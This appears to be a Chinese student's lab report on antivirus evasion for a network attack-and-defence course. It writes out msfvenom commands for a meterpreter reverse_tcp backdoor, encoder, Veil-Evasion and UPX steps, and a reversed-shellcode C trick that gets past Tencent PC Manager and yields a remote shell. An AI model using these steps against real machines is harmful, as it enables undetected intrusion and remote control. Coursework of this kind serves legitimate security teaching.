20155305《网络对抗》免杀原理与实践

#20155305《网络对抗》免杀原理与实践 ##实验主要过程 ###一、免杀效果参考基准python

• Kali使用上次实验msfvenom产生后门的可执行文件，刚刚传送到Win主机就被电脑管家查杀了恢复后此次放入老师提供的网址http://www.virscan.org/进行扫描，有48%的杀软报告病毒。

###二、使用msf编码器windows

• 编码一次 Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=kali的IP LPORT=5305端口号 -f exe >本身起后门名字.exe

理论上会下降被查出率，但由于老师说因为使用的这个编码平台太著名了，很容易被杀软盯上，因此实际上并无什么变化。网站监测结果是51%的杀软报告病毒，还不如不编码呢（高了两个百分点）。数组

回连成功网络

• 屡次编码 Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=kali的IP LPORT=5305端口号 -f exe > 本身起后门名字.exe

屡次编码依旧没有任何做用，被电脑管家查杀，恢复后放入网站检查tcp

尝试回连，录音功能成功优化

###三、使用Veil-Evasion从新编写源代码网站

• 在Kali中安装veil，sudo apt-get install veil，这其中有paython的安装可能有些电脑没有wine32，因此须要安装apt-get install wine32

• 在Kali的终端中启动Veil-Evasion 命令行中输入veil，后在veil中输入命令use evasion 依次输入以下命令生成你的可执行文件：

use python/meterpreter/rev_tcp.py（设置payload）编码

set LHOST Kali的IP（设置反弹链接IP）命令行

set LPORT 端口号（设置反弹端口）3d

generate 可执行文件名

选择使用语言来编写

根据生成路径找到生成的可执行文件，放到网上进行检测，有20%的杀软报告病毒，这个异常难安装的veil加python终于下降了被查杀率，仍是有些效果的。 尝试回连，拍照功能成功

###四、UPX加壳尝试

命令upx 5305.exe -o 5305-2.exe

upx加壳后的5305-2.exe看着很牛皮，可是被电脑管家妥妥查杀了。。。

再在网站扫描一下，百分之48的惊人数听说明upx加壳没什么用啊

###五、C语言调用Shellcode

• 首先，在Kali上使用命令生成一个c语言格式的Shellcode数组。

• VS编译运行产生exe文件（exe文件名不能存在20155305这样的学号由于网站检测时会说有明显广告语。。）

• 只有百分之十二的杀软报告发现病毒，免杀效果很是可观，重点是个人腾讯管家没有弹出警告，有点遗憾，但有以为免杀学会了以后确实有点厉害哦

• 优化

上面的结果已经不错了，可是还能够更好，好比逆序修改Shellcode数组，而后再用它替换上面的c文件里本来的Shellcode数组。编译运行后结果有了很大提高，电脑管家没有查杀出来，优化先后都可实现杀软共生

###六、实测优化版本、回连成功

按照上次实验用过的msf监听方法在Kali上打开监听，在Win主机开启杀软（Win安装腾讯电脑管家 ）的状况下，运行最后生成的优化版exe文件，Kali成功获取了Win主机的权限